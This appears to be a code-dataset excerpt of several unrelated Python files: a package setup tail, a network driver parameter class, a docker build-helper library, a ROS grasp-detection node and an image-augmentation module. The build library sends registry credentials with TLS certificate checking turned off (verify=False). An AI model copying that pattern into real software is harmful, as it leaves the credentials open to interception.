description='Simple-LINELIB',
long_description=long_description,
author='<NAME>',
author_email='<EMAIL>',
url='https://github.com/CyberTKR/Simple-LINELIB',
packages=find_packages(include=['CyberTK', 'CyberTK.*']),
install_requires=[
'httpx==0.19.0',
'requests',
'thrift',
'CyberTKAPI'
],
extras_require={'httpx': ['http2']}
)
| 1.34375 | 1 |
lib/SeparateDriver/CgwshDeviceDriverSetParameterECDB.py | multi-service-fabric/element-manager | 0 | 3487 | <filename>lib/SeparateDriver/CgwshDeviceDriverSetParameterECDB.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright(c) 2019 Nippon Telegraph and Telephone Corporation
# Filename: CgwshDeviceDriverSetParameterECDB.py
'''
Parameter module for Cgwsh driver configuration
'''
import GlobalModule
from EmCommonLog import decorater_log
from DriverSetParameterECDB import DriverSetParameterECDB
class CgwshDeviceDriverSetParameterECDB(DriverSetParameterECDB):
'''
Parameter class for Cgwsh driver configuration
'''
@decorater_log
def __init__(self,
device_name=None,
ec_message=None,
db_info=None):
'''
Constructor
'''
super(CgwshDeviceDriverSetParameterECDB, self).__init__(device_name,
ec_message,
db_info)
self.ec_message = self.ec_message["device"]
@decorater_log
def get_service_info(self):
'''
Service information is acquired.
'''
pass
@decorater_log
def get_management_info(self):
'''
Management information is acquired.
'''
get_info = {}
get_info["device_name"] = self.ec_message.get("name")
GlobalModule.EM_LOGGER.debug("get management_info = %s" % (get_info,))
return get_info
@decorater_log
def get_static_route_info(self):
'''
Static route information is acquired.
acquired dict:
{
static_route:[{
ip_address:str,
subnet_mask:str,
gateway_address:str
}]
}
'''
get_info = {}
tmp_list = []
routes = self.ec_message.get("serviceInfo", {}).get("staticRoute", ())
for route in routes:
tmp_item = {}
tmp_item["ip_address"] = route.get("ipAddress")
tmp_item["subnet_mask"] = route.get("subnetMask")
tmp_item["gateway_address"] = route.get("gatewayIpAddress")
tmp_list.append(tmp_item)
get_info["static_route"] = tmp_list
GlobalModule.EM_LOGGER.debug("get static_route = %s" % (get_info,))
return get_info
@decorater_log
def get_tunnel_if_info(self):
'''
Tunnel interface information is acquired.
acquired dict:
{
tunnel_if:[{
vrf_name:str,
if_name:str,
uni_if_name:str,
uni_vlan_id:str,
tunnel_source:str,
}]
}
'''
get_info = {}
tmp_list = []
tunnel_uni = self.ec_message.get("serviceInfo", {}).get("uni", ())
tunnel_officeInfo = self.ec_message.get(
"serviceInfo", {}).get("officeInfo", ())
vrf_name = tunnel_uni.get("vrfName")
uni_if_name = tunnel_uni.get("ifName")
uni_vlan_id = tunnel_uni.get("vlanId")
for tunnel in tunnel_officeInfo:
tmp_item = {}
tmp_item["vrf_name"] = vrf_name
tmp_item["if_name"] = tunnel.get("tunnelIfName")
tmp_item["uni_if_name"] = uni_if_name
tmp_item["uni_vlan_id"] = uni_vlan_id
tmp_item["tunnel_source"] = tunnel.get(
"tunnelSrcIpAddress")
tmp_list.append(tmp_item)
get_info["tunnel_if"] = tmp_list
GlobalModule.EM_LOGGER.debug("get tunnel_if = %s" % (get_info,))
return get_info
@decorater_log
def get_pppoe_info(self):
'''
PPPoE information is acquired.
acquired dict:
{
pppoe:[{
username:str,
password:str,
tenant:str,
pp_no:str
}]
}
'''
get_info = {}
tmp_list = []
ppp_infos = self.ec_message.get("serviceInfo", {}).get("pppInfo", ())
for ppp_info in ppp_infos:
tmp_item = {}
tmp_item["username"] = ppp_info.get("connectionId")
tmp_item["password"] = <PASSWORD>.get("connectionPassword")
tmp_item["tenant"] = ppp_info.get("corporationId")
tmp_item["pp_no"] = ppp_info.get("ppId")
tmp_list.append(tmp_item)
get_info["pppoe"] = tmp_list
GlobalModule.EM_LOGGER.debug("get pppoe = %s" % (get_info,))
return get_info
| 2.015625 | 2 |
scripts/common_lib/build_lib.py | Bhaskers-Blu-Org1/wc-devops-utilities | 15 | 3488 | <filename>scripts/common_lib/build_lib.py
#!/usr/bin/env python3.6
import os
import subprocess
import json
import argparse
import zipfile
import shutil
import requests
import datetime
import re
import operator
import unicodedata
# global list of error messages to keep track of all error msgs
errorMessages = []
"""
Collection of Common Functions used by Build Scripts
A collection of common functions shared by each individual build scripts.
"""
def get(url, usr, pwd):
"""
HTTP/HTTPS GET requests using external Python module requests
@param url the url of the REST call
@param usr the functional username for the docker registry
@param pwd the password for the docker registry functional user
@return a JSON response
"""
headers = {
'Accept': 'application/vnd.docker.distribution.manifest.v1+json',
}
# TEMP: Remove the suppressed verification once the docker cert location
# is figured out and we specify it in REQUESTS_CA_BUNDLE
return requests.get(url, auth=(usr, pwd), headers=headers, verify=False)
def get_latest_tag(registry_path, usr, pwd):
"""
Retrieve the latest version of an image based on its tags: vX-YYYYMMDD-HHmm.
The latest, by definition, is defined to be the one with the highest version
number (vX) and the latest timestamp (YYYYMMDD-HHmm).
@param registry_path docker registry path
@param usr the functional username for the docker registry
@param pwd the password for the docker registry functional user
@return the latest image tag
"""
tag_list_url = registry_path + '/tags/list'
request = get(tag_list_url, usr, pwd)
tag_list = json.loads(request.text)
for tag in tag_list['tags']:
if '-' not in tag:
continue
str_version, str_dash, str_timestamp = tag.partition('-')
tag_format="%Y%m%d-%H%M"
try:
dt_timestamp = datetime.datetime.strptime(str_timestamp, tag_format)
except ValueError:
continue
try:
latest_version
latest_timestamp
latest_tag
except NameError:
latest_version = str_version
latest_timestamp = dt_timestamp
latest_tag = tag
else:
if latest_version > str_version:
continue
elif latest_version < str_version:
latest_version = str_version
latest_timestamp = dt_timestamp
latest_tag = tag
else:
if latest_timestamp < dt_timestamp:
latest_timestamp = dt_timestamp
latest_tag = tag
return latest_tag
def unzip(zip_file, to_dir):
"""
Generic unzip function for extracting zip files
@param zip_file the zip file to be extracted
@param to_dir the destination directory to extract the zip file to
"""
with zipfile.ZipFile(zip_file, "r") as zip_ref:
zip_ref.extractall(to_dir)
zip_ref.close()
def create_dockerfile(dockerfile_parent_dir, docker_url, image_namespace, image_name, image_tag_latest):
"""
Creates a dockerfile using the correct docker registry URL associated
with the datacenter this script is being run on
:param str dockerfile_parent_dir: path to the parent directory for the Dockerfile
:param str docker_url: the docker registry VIP accessible from the mesos slaves
:param str image_namespace: the name of the image
:param str image_name: the name of the image
:param str image_tag_latest: the latest version tag of the base image
:returns: None
"""
# Form the path for the Dockerfile based on the parent of the caller script
dockerfile_path = os.path.join(dockerfile_parent_dir, "Dockerfile")
# Create the Dockerfile
dockerfile = open(dockerfile_path, "w+")
# Format the FROM command
dockerfile_from_cmd = "FROM " + docker_url + image_namespace + "/" + image_name + ":" + image_tag_latest
# Write the FROM command string to the Dockerfile
dockerfile.write(dockerfile_from_cmd)
# Close the open file instance
dockerfile.close()
def set_docker_client_timeout():
"""
Sets the DOCKER_CLIENT_TIMEOUT environment variable to 300
"""
os.environ['DOCKER_CLIENT_TIMEOUT'] = '300'
print("The timeout set for docker client: " + os.environ['DOCKER_CLIENT_TIMEOUT'] + " seconds")
# ======================= verify bundle Structure ===============================================
def openJSONfile(jsonFile):
"""
Function to open a JSON file
@param jsonFile path to the JSON file
@return the loaded JSON file
"""
try:
with open(jsonFile) as json_data_file:
data = json.load(json_data_file)
except:
addToErrorMessages("The specified JSON file is not valid: " + jsonFile)
raise
return data
def directoryToJSON(directory):
"""
Function to convert objects in a given directory into JSON form.
The parent object is always a dict, it may contain children if type=directory.
A directory is composed of a list and may contain files and/or directories.
@param directory directory to convert
@return JSON representation of a directory
"""
d = {'name': os.path.basename(directory)} # the parent object is dict
if os.path.isdir(directory):
d['type'] = "directory"
# directory may have children
# the children in a directory is a list composed of more files/directories
d['children'] = [directoryToJSON(os.path.join(directory,x)) for x in os.listdir(directory)]
else:
d['type'] = "file"
return d
def verifyBundleStructure(expected, actual, currentPath):
"""
Function to verify if an uploaded bundle follows IBM defined structure
@param expected the JSON representation of the IBM defined structure
@param actual the JSON representation of the actual structure of the uploaded bundle
@param currentPath the path currently being checked (used to build paths recursively for error msg)
@return True if structure of the uploaded bundle follows IBM defined structure. False otherwise.
"""
isMatched = True
if type(expected) is dict:
if matches(expected,actual): # a matching file or directory was found
if expected['type'] == 'directory':
currentPath = currentPath + actual['name'] + "/"
if expected['children'] == "_any":
isMatched = isMatched & True # if the contents of the directory can be anything then do no further checking
else:
isMatched = isMatched & verifyBundleStructure(expected['children'], actual['children'], currentPath) # do further checking
else: # a matching file or directory was not found
if expected['fail-if-not-found'] == "yes":
logBundleStructureErrorMessage(expected, currentPath)
return False
if type(expected) is list:
for k in range(0,len(expected)):
isMatched = isMatched & verifyActualContainsExpectedElement(actual, expected[k], currentPath, isMatched)
return isMatched
def logBundleStructureErrorMessage(expected, currentPath):
"""
Function to adds error messages to the global array.
@param expected the expected element
@param currentPath the current path we are on that has the missing file or directory
"""
addToErrorMessages("A "+ expected['type'] +" is missing from the path: \"" + currentPath + "\"")
addToErrorMessages(expected['error-message-if-fails'])
return
def matches(expectedElement, actualElement):
"""
Function to check if files/directories match. They must have the same name and must both be the same type.
@param expectedElement the expected element. May be defined by regular expression
@param actualElement the actual element
"""
ret = False
if re.fullmatch(expectedElement['name'], actualElement['name']) is not None and expectedElement['type'] == actualElement['type']:
ret = True
return ret
def verifyActualContainsExpectedElement(actual, expectedElement, currentPath, isMatched):
"""
Function to verify if an actual list of objects contains an expected element. Helper method to verifyBundleStructure.
@param actual list of the actual files and directories in the bundle
@param expectedElement the expected element to find in the bundle
@param currentPath the path currently being checked (used to build paths recursively for error msg)
@param isMatched (only used for recursive calls)
@return True if the list of actual objects contain the expected element
"""
# if actual is a dict then verify it and its children
if type(actual) is dict:
isMatched = isMatched & verifyBundleStructure(expectedElement,actual, currentPath)
# if actual is a list then find out if they match anywhere, if so get the matched position
elif type(actual) is list:
matchedPosition = -1
for i in range(0, len(actual)):
if matches(expectedElement,actual[i]):
matchedPosition = i
break
if matchedPosition != -1: # if they match then verify their children too
isMatched = isMatched & verifyBundleStructure(expectedElement, actual[matchedPosition] , currentPath)
else : # if they don't match then log the error msg and return false
if expectedElement['fail-if-not-found'] == "yes": # log error msg and return false if needed
isMatched = False
logBundleStructureErrorMessage(expectedElement, currentPath)
return isMatched
def addToErrorMessages(errorMessage):
"""
Function to add error messages to the global list of errorMessages
@param errorMessage the error message to add
"""
print(errorMessage)
global errorMessges
errorMessages.extend([errorMessage])
return
def unzipRecursively(zipFileName, directoryToUnzipTo):
"""
Function to unzip a ZIP file recursively
@param zipFileName the zip file to be extracted
@param directoryToUnzipTo the destination directory to extract the zip file to
"""
# update
if zipFileName.endswith(".zip"): #check if it's a .zip
unzip(zipFileName,directoryToUnzipTo)
os.remove(zipFileName)
for x in os.listdir(directoryToUnzipTo):
subdirectory = os.path.join(directoryToUnzipTo, os.path.splitext(x)[0])
subfile = os.path.join(directoryToUnzipTo, x )
unzipRecursively(subfile, subdirectory)
return
def zipFileIsGood(filePath):
"""
Function to test if a ZIP file is good or bad
@param filePath the zip file to be tested
@return True if the ZIP file is good. False otherwise.
"""
ret = True
try:
the_zip_file = zipfile.ZipFile(filePath)
badFile = the_zip_file.testzip()
if badFile is not None:
ret = False
else:
ret = True
except:
ret = False
return ret
def verifyZipFile(zipDirectory, nameOfBundle):
"""
Function to verify if an uploaded bundle is:
1) a valid zip file
2) follows IBM defined structure
@param zipDirectory where the bundle ZIP is located
@param nameOfBundle name of the bundle ZIP file
"""
print ('Validating bundle structure...')
bundleIsGood = True
bundleZip = os.path.join(zipDirectory, nameOfBundle)
if zipFileIsGood(bundleZip):
try:
# copy bundle into new working directory -----------------------------------------------------------
directoryToUnzipTo = os.path.join(zipDirectory, "temp")
if not os.path.exists(directoryToUnzipTo):
os.makedirs(directoryToUnzipTo)
shutil.copy(bundleZip, os.path.join(directoryToUnzipTo, nameOfBundle))
# unzip the bundle ----------------------------------------------------------------------------------
unzipRecursively(os.path.join(directoryToUnzipTo, nameOfBundle), os.path.join(directoryToUnzipTo, os.path.splitext(nameOfBundle)[0]))
# verify structure of bundle ------------------------------------------------------------------------
# check package stucture
expectedPackageStructure = openJSONfile(os.path.join(zipDirectory, "bundle-definition.json"))
actualBundleStructure = directoryToJSON(directoryToUnzipTo) # convert the unzipped directory to JSON file
bundleIsGood = verifyBundleStructure(expectedPackageStructure, actualBundleStructure, "")
if not bundleIsGood:
addToErrorMessages("The uploaded bundle does not meet predefined structure. Could not proceed with deployment.")
# clean up unzipped stuff and package structure Json -------------------------------------------------
shutil.rmtree(directoryToUnzipTo)
except:
addToErrorMessages("Exception occurred while verifying bundle structure. Could not proceed with deployment.")
bundleIsGood = False
else:
bundleIsGood = False
addToErrorMessages("The uploaded bundle could not be unzipped. Could not proceed with deployment.")
# out put report value , join all the messages together
print ("report=[" + ". ".join(str(x) for x in errorMessages) + "]")
return bundleIsGood
| 2.515625 | 3 |
src/static_grasp_kt.py | ivalab/GraspKpNet | 16 | 3489 | <filename>src/static_grasp_kt.py
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import _init_paths
import os
import json
import cv2
import cv2.aruco as aruco
import numpy as np
import sys
import rospy
from std_msgs.msg import Bool
from std_msgs.msg import Float64MultiArray
from sensor_msgs.msg import Image, CameraInfo
from cv_bridge import CvBridge, CvBridgeError
import message_filters
import torch
from external.nms import soft_nms
from opts import opts
from logger import Logger
from utils.utils import AverageMeter
from datasets.dataset_factory import dataset_factory
from detectors.detector_factory import detector_factory
# transformation from the robot base to aruco tag
M_BL = np.array([[1., 0., 0., 0.30000],
[0., 1., 0., 0.32000],
[0., 0., 1., -0.0450],
[0., 0., 0., 1.00000]])
# default transformation from the camera to aruco tag
default_M_CL = np.array([[-0.07134498, -0.99639369, 0.0459293, -0.13825178],
[-0.8045912, 0.03027403, -0.59305689, 0.08434352],
[ 0.58952768, -0.07926594, -0.8038495, 0.66103522],
[ 0., 0., 0., 1. ]]
)
# camera intrinsic matrix of Realsense D435
cameraMatrix = np.array([[607.47165, 0.0, 325.90064],
[0.0, 606.30420, 240.91934],
[0.0, 0.0, 1.0]])
# distortion of Realsense D435
distCoeffs = np.array([0.08847, -0.04283, 0.00134, -0.00102, 0.0])
# initialize GKNet Detector
opt = opts().parse()
Dataset = dataset_factory[opt.dataset]
opt = opts().update_dataset_info_and_set_heads(opt, Dataset)
print(opt)
Detector = detector_factory[opt.task]
detector = Detector(opt)
# Publisher of perception result
pub_res = rospy.Publisher('/result', Float64MultiArray, queue_size=10)
def get_M_CL_info(gray, image_init, visualize=False):
# parameters
markerLength_CL = 0.093
aruco_dict_CL = aruco.Dictionary_get(aruco.DICT_ARUCO_ORIGINAL)
# aruco_dict_CL = aruco.Dictionary_get(aruco.DICT_6X6_250)
parameters = aruco.DetectorParameters_create()
corners_CL, ids_CL, rejectedImgPoints = aruco.detectMarkers(gray, aruco_dict_CL, parameters=parameters)
# for the first frame, it may contain nothing
if ids_CL is None:
return default_M_CL, None
rvec_CL, tvec_CL, _objPoints_CL = aruco.estimatePoseSingleMarkers(corners_CL[0], markerLength_CL,
cameraMatrix, distCoeffs)
dst_CL, jacobian_CL = cv2.Rodrigues(rvec_CL)
M_CL = np.zeros((4, 4))
M_CL[:3, :3] = dst_CL
M_CL[:3, 3] = tvec_CL
M_CL[3, :] = np.array([0, 0, 0, 1])
if visualize:
# print('aruco is located at mean position (%d, %d)' %(mean_x ,mean_y))
aruco.drawAxis(image_init, cameraMatrix, distCoeffs, rvec_CL, tvec_CL, markerLength_CL)
return M_CL, corners_CL[0][0, :, :]
def aruco_tag_remove(rgb_image, corners):
img_out = rgb_image.copy()
# find the top-left and right-bottom corners
min = sys.maxsize
max = -sys.maxsize
tl_pxl = None
br_pxl = None
for corner in corners:
if corner[0] + corner[1] < min:
min = corner[0] + corner[1]
tl_pxl = [int(corner[0]), int(corner[1])]
if corner[0] + corner[1] > max:
max = corner[0] + corner[1]
br_pxl = [int(corner[0]), int(corner[1])]
# get the replacement pixel value
rep_color = img_out[tl_pxl[0] - 10, tl_pxl[1] - 10, :]
for h in range(tl_pxl[1] - 45, br_pxl[1] + 46):
for w in range(tl_pxl[0] - 45, br_pxl[0] + 46):
img_out[h, w, :] = rep_color
return img_out
def project(pixel, depth_image, M_CL, M_BL, cameraMatrix):
'''
project 2d pixel on the image to 3d by depth info
:param pixel: x, y
:param M_CL: trans from camera to aruco tag
:param cameraMatrix: camera intrinsic matrix
:param depth_image: depth image
:param depth_scale: depth scale that trans raw data to mm
:return:
q_B: 3d coordinate of pixel with respect to base frame
'''
depth = depth_image[pixel[1], pixel[0]]
# if the depth of the detected pixel is 0, check the depth of its neighbors
# by counter-clock wise
nei_range = 1
while depth == 0:
for delta_x in range(-nei_range, nei_range + 1):
for delta_y in range(-nei_range, nei_range + 1):
nei = [pixel[0] + delta_x, pixel[1] + delta_y]
depth = depth_image[nei[1], nei[0]]
if depth != 0:
break
if depth != 0:
break
nei_range += 1
pxl = np.linalg.inv(cameraMatrix).dot(
np.array([pixel[0] * depth, pixel[1] * depth, depth]))
q_C = np.array([pxl[0], pxl[1], pxl[2], 1])
q_L = np.linalg.inv(M_CL).dot(q_C)
q_B = M_BL.dot(q_L)
return q_B
def pre_process(rgb_img, depth_img):
inp_image = rgb_img
inp_image[:, :, 0] = depth_img
inp_image = cv2.resize(inp_image, (256, 256))
return inp_image
def kinect_rgbd_callback(rgb_data, depth_data):
"""
Save raw RGB and depth input from Kinect V1
:param rgb_data: RGB image
:param depth_data: raw depth image
:return: None
"""
try:
cv_rgb = cv_bridge.imgmsg_to_cv2(rgb_data, "bgr8")
cv_depth = cv_bridge.imgmsg_to_cv2(depth_data, "32FC1")
cv_rgb_arr = np.array(cv_rgb, dtype=np.uint8)
cv_depth_arr = np.array(cv_depth, dtype=np.float32)
# cv_depth_arr = np.nan_to_num(cv_depth_arr)
cv2.imshow("Depth", cv_depth)
cv2.imshow("RGB", cv_rgb)
img = cv_rgb_arr.copy()
depth_raw = cv_depth_arr.copy()
gray = img.astype(np.uint8)
depth = (depth_raw * 1000).astype(np.uint8)
# get the current transformation from the camera to aruco tag
M_CL, corners = get_M_CL_info(gray, img, False)
# remove aruco tag from input image to avoid mis-detection
if corners is not None:
img_wo_at = aruco_tag_remove(img, corners)
# replace blue channel with the depth channel
inp_image = pre_process(img_wo_at, depth)
# pass the image into the network
ret = detector.run(inp_image[:, :, :])
ret = ret["results"]
loc_ori = KpsToGrasppose(ret, img, depth_raw, M_CL, M_BL, cameraMatrix)
pub_res.publish(loc_ori)
except CvBridgeError as e:
print(e)
def isWithinRange(pxl, w, h):
x, y = pxl[:]
return w/12. <= x <= 11*w/12 and h/12. <= y <= 11*h/12
def KpsToGrasppose(net_output, rgb_img, depth_map, M_CL, M_BL, cameraMatrix, visualize=True):
kps_pr = []
for category_id, preds in net_output.items():
if len(preds) == 0:
continue
for pred in preds:
kps = pred[:4]
score = pred[-1]
kps_pr.append([kps[0], kps[1], kps[2], kps[3], score])
# no detection
if len(kps_pr) == 0:
return [0, 0, 0, 0]
# sort by the confidence score
kps_pr = sorted(kps_pr, key=lambda x: x[-1], reverse=True)
# select the top 1 grasp prediction within the workspace
res = None
for kp_pr in kps_pr:
f_w, f_h = 640. / 512., 480. / 512.
kp_lm = (int(kp_pr[0] * f_w), int(kp_pr[1] * f_h))
kp_rm = (int(kp_pr[2] * f_w), int(kp_pr[3] * f_h))
if isWithinRange(kp_lm, 640, 480) and isWithinRange(kp_rm, 640, 480):
res = kp_pr
break
if res is None:
return [0, 0, 0, 0]
f_w, f_h = 640./512., 480./512.
kp_lm = (int(res[0]*f_w), int(res[1]*f_h))
kp_rm = (int(res[2]*f_w), int(res[3]*f_h))
center = (int((kp_lm[0]+kp_rm[0])/2), int((kp_lm[1]+kp_rm[1])/2))
kp_lm_3d = project(kp_lm, depth_map, M_CL, M_BL, cameraMatrix)
kp_rm_3d = project(kp_rm, depth_map, M_CL, M_BL, cameraMatrix)
center_3d = project(center, depth_map, M_CL, M_BL, cameraMatrix)
orientation = np.arctan2(kp_rm_3d[1] - kp_lm_3d[1], kp_rm_3d[0] - kp_lm_3d[0])
# motor 7 is clockwise
if orientation > np.pi / 2:
orientation = np.pi - orientation
elif orientation < -np.pi / 2:
orientation = -np.pi - orientation
else:
orientation = -orientation
# compute the open width
dist = np.linalg.norm(kp_lm_3d[:2] - kp_rm_3d[:2])
# draw arrow for left-middle and right-middle key-points
lm_ep = (int(kp_lm[0] + (kp_rm[0] - kp_lm[0]) / 5.), int(kp_lm[1] + (kp_rm[1] - kp_lm[1]) / 5.))
rm_ep = (int(kp_rm[0] + (kp_lm[0] - kp_rm[0]) / 5.), int(kp_rm[1] + (kp_lm[1] - kp_rm[1]) / 5.))
rgb_img = cv2.arrowedLine(rgb_img, kp_lm, lm_ep, (0, 0, 0), 2)
rgb_img = cv2.arrowedLine(rgb_img, kp_rm, rm_ep, (0, 0, 0), 2)
# draw left-middle, right-middle and center key-points
rgb_img = cv2.circle(rgb_img, (int(kp_lm[0]), int(kp_lm[1])), 2, (0, 0, 255), 2)
rgb_img = cv2.circle(rgb_img, (int(kp_rm[0]), int(kp_rm[1])), 2, (0, 0, 255), 2)
rgb_img = cv2.circle(rgb_img, (int(center[0]), int(center[1])), 2, (0, 0, 255), 2)
if visualize:
cv2.namedWindow('visual', cv2.WINDOW_AUTOSIZE)
cv2.imshow('visual', rgb_img)
return [center_3d[0], center_3d[1], center_3d[2], orientation, dist]
if __name__ == '__main__':
# initialize ros node
rospy.init_node("Static_grasping")
# Bridge to convert ROS Image type to OpenCV Image type
cv_bridge = CvBridge()
cv2.WITH_QT = False
# Get camera calibration parameters
cam_param = rospy.wait_for_message('/camera/rgb/camera_info', CameraInfo, timeout=None)
# Subscribe to rgb and depth channel
image_sub = message_filters.Subscriber("/camera/rgb/image_rect_color", Image)
depth_sub = message_filters.Subscriber("/camera/depth_registered/image", Image)
ts = message_filters.ApproximateTimeSynchronizer([image_sub, depth_sub], 1, 0.1)
ts.registerCallback(kinect_rgbd_callback)
rospy.spin() | 1.695313 | 2 |
source/utils/augmentations.py | dovietchinh/multi-task-classification | 0 | 3490 | <reponame>dovietchinh/multi-task-classification<filename>source/utils/augmentations.py<gh_stars>0
import numpy as np
import cv2
import random
def preprocess(img,img_size,padding=True):
"""[summary]
Args:
img (np.ndarray): images
img_size (int,list,tuple): target size. eg: 224 , (224,224) or [224,224]
padding (bool): padding img before resize. Prevent from image distortion. Defaults to True.
Returns:
images (np.ndarray): images in target size
"""
if padding:
height,width,_ = img.shape
delta = height - width
if delta > 0:
img = np.pad(img,[[0,0],[delta//2,delta//2],[0,0]], mode='constant',constant_values =255)
else:
img = np.pad(img,[[-delta//2,-delta//2],[0,0],[0,0]], mode='constant',constant_values =255)
if isinstance(img_size,int):
img_size = (img_size,img_size)
return cv2.resize(img,img_size)
class RandAugment:
def __init__(self, augment_params):
self.num_layers = augment_params['num_layers']
self.AUGMENT_FUNCTION = {
'fliplr' : RandAugment.augment_fliplr if augment_params.get('fliplr') else None,
'augment_hsv' : RandAugment.augment_hsv if augment_params.get('augment_hsv') else None,
'hist_equalize' : RandAugment.hist_equalize if augment_params.get('hist_equalize') else None,
'solarize' : RandAugment.solarize if augment_params.get('solarize') else None,
'posterize': RandAugment.posterize if augment_params.get('posterize') else None,
'adjust_brightness': RandAugment.adjust_brightness if augment_params.get('adjust_brightness') else None,
'invert' : RandAugment.invert if augment_params.get('invert') else None,
'contrast': RandAugment.contrast if augment_params.get('contrast') else None,
'shearX' : RandAugment.shear_x if augment_params.get('shearX') else None,
'shearY' : RandAugment.shear_y if augment_params.get('shearY') else None,
'translateX' : RandAugment.translate_x if augment_params.get('translateX') else None,
'translateY' : RandAugment.translate_y if augment_params.get('translateY') else None,
'sharpness' : RandAugment.sharpness if augment_params.get('sharpness') else None,
'cutout' : RandAugment.cutout if augment_params.get('cutout') else None,
'rotate' : RandAugment.rotate if augment_params.get('rotate') else None,
'cut_25_left' : RandAugment.cut_25_left if augment_params.get('cut_25_left') else None,
'cut_25_right': RandAugment.cut_25_right if augment_params.get('cut_25_right') else None,
'cut_25_above': RandAugment.cut_25_above if augment_params.get('cut_25_above') else None,
'cut_25_under': RandAugment.cut_25_under if augment_params.get('cut_25_under') else None,
# 'random_crop':random_crop
}
self.ARGS_LIMIT = {
'fliplr' : augment_params.get('fliplr'),
'augment_hsv': augment_params.get('augment_hsv'),
'hist_equalize' : augment_params.get('hist_equalize'),
'solarize' : augment_params.get('solarize'),
'posterize': augment_params.get('posterize'),
'adjust_brightness': augment_params.get('adjust_brightness'),
'invert' : augment_params.get('invert'),
'contrast': augment_params.get('contrast'),
'shearX' : augment_params.get('shearX'),
'shearY' : augment_params.get('shearY'),
'translateX' : augment_params.get('translateX'),
'translateY' : augment_params.get('translateY'),
'sharpness' : augment_params.get('sharpness'),
'cutout' : augment_params.get('cutout'),
'rotate' : augment_params.get('rotate'),
'cut_25_left' : augment_params.get('cut_25_left'),
'cut_25_right': augment_params.get('cut_25_right'),
'cut_25_above': augment_params.get('cut_25_above'),
'cut_25_under': augment_params.get('cut_25_under')
# 'random_crop':random_crop
}
self.policy = list(k for k,v in self.AUGMENT_FUNCTION.items() if v)
# print(self.policy)
def mixup(img1,img2,factor):
img = img1.astype('float')* factor + img2.astype('float') * (1-factor)
img = np.clip(img, 0,255)
img = img.astype('uint8')
return img
def augment_fliplr(img,level):
if random.random() < level:
return np.fliplr(img)
return img
def augment_hsv(im, level=None, hgain=0.015, sgain=0.7, vgain=0.4):
im = im.copy()
# HSV color-space augmentation
if hgain or sgain or vgain:
r = np.random.uniform(-1, 1, 3) * [hgain, sgain, vgain] + 1 # random gains
hue, sat, val = cv2.split(cv2.cvtColor(im, cv2.COLOR_BGR2HSV))
dtype = im.dtype # uint8
x = np.arange(0, 256, dtype=r.dtype)
lut_hue = ((x * r[0]) % 180).astype(dtype)
lut_sat = np.clip(x * r[1], 0, 255).astype(dtype)
lut_val = np.clip(x * r[2], 0, 255).astype(dtype)
im_hsv = cv2.merge((cv2.LUT(hue, lut_hue), cv2.LUT(sat, lut_sat), cv2.LUT(val, lut_val)))
cv2.cvtColor(im_hsv, cv2.COLOR_HSV2BGR, dst=im) # no return needed
return im_hsv
def hist_equalize(im, level=None,clahe=True, bgr=True):
im = im.copy()
# Equalize histogram on BGR image 'im' with im.shape(n,m,3) and range 0-255
yuv = cv2.cvtColor(im, cv2.COLOR_BGR2YUV if bgr else cv2.COLOR_RGB2YUV)
if clahe:
c = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8, 8))
yuv[:, :, 0] = c.apply(yuv[:, :, 0])
else:
yuv[:, :, 0] = cv2.equalizeHist(yuv[:, :, 0]) # equalize Y channel histogram
return cv2.cvtColor(yuv, cv2.COLOR_YUV2BGR if bgr else cv2.COLOR_YUV2RGB) # convert YUV image to RGB
def solarize(image, level=128):
threshold = level
image = image.copy()
# For each pixel in the image, select the pixel
# if the value is less than the threshold.
# Otherwise, subtract 255 from the pixel.
return np.where(image <= threshold, image, 255 - image)
def posterize(img, level=3):
bits = level
shift = 8 - bits
# img = img >> shift
img = np.left_shift(img,shift)
img = np.right_shift(img,shift)
return img.astype('uint8')
def adjust_brightness(img,level=0.5):
factor = level
degenerate = np.zeros(img.shape,dtype='uint8')
img = RandAugment.mixup(img,degenerate,factor)
return img
def invert(img,level=None):
return 255-img
def contrast(img,factor=0.5):
degenerate = cv2.cvtColor(cv2.cvtColor(img, cv2.COLOR_BGR2GRAY), cv2.COLOR_GRAY2BGR)
return RandAugment.mixup(img,degenerate,factor)
def shear_x(img,level=0.4,mode='reflect'):
M = np.array([[1, level, 0],
[0, 1 , 0],
[0, 0 , 1]],dtype='float')
height,width,_ = img.shape
option_mode ={
'reflect' : cv2.BORDER_REPLICATE,
'constant' : cv2.BORDER_CONSTANT
}
mode = option_mode[mode]
sheared_img = cv2.warpPerspective(img, M, (width, height), borderMode=mode)
return sheared_img
def shear_y(img,level=0.4,mode='reflect'):
M = np.array([[1, 0 , 0],
[level, 1 , 0],
[0, 0 , 1]],dtype='float')
height,width,_ = img.shape
option_mode ={
'reflect' : cv2.BORDER_REPLICATE,
'constant' : cv2.BORDER_CONSTANT
}
mode = option_mode[mode]
sheared_img = cv2.warpPerspective(img, M, (width, height), borderMode=mode)
return sheared_img
def translate_x(img,level,mode='reflect'):
height,width,_ = img.shape
option_mode ={
'reflect' : cv2.BORDER_REPLICATE,
'constant' : cv2.BORDER_CONSTANT
}
mode = option_mode[mode]
translate_pixel = int(width * level)
M = np.array([[1, 0 , translate_pixel],
[level, 1 , 0],
[0, 0 , 1]],dtype='float')
translate_img = cv2.warpPerspective(img, M, (width, height), borderMode=mode)
return translate_img
def translate_y(img,level,mode='reflect'):
height,width,_ = img.shape
option_mode ={
'reflect' : cv2.BORDER_REPLICATE,
'constant' : cv2.BORDER_CONSTANT
}
mode = option_mode[mode]
translate_pixel = int(width * level)
M = np.array([[1, 0 , 0],
[level, 1 , translate_pixel],
[0, 0 , 1]],dtype='float')
translate_img = cv2.warpPerspective(img, M, (width, height), borderMode=mode)
return translate_img
# def sharpness(img,):
# kernel = np.array(
# [[1, 1, 1],
# [1, 5, 1],
# [1, 1, 1]], dtype=tf.float32,
# shape=[3, 3, 1, 1]) / 13.
# cv2.
def cutout(img,level,**kwargs):
img = img.copy()
height,width ,_ = img.shape
padding_size = int(height*level),int(width*level)
value = kwargs.get('value')
cordinate_h = np.random.randint(0,height-padding_size[0])
cordinate_w = np.random.randint(0,width-padding_size[1])
img[cordinate_h:cordinate_h+padding_size[0],cordinate_w:cordinate_w+padding_size[1],:] = 255
return img
def rotate(image, level=45, center = None, scale = 1.0):
angle=level
(h, w) = image.shape[:2]
if center is None:
center = (w / 2, h / 2)
# Perform the rotation
M = cv2.getRotationMatrix2D(center, angle, scale)
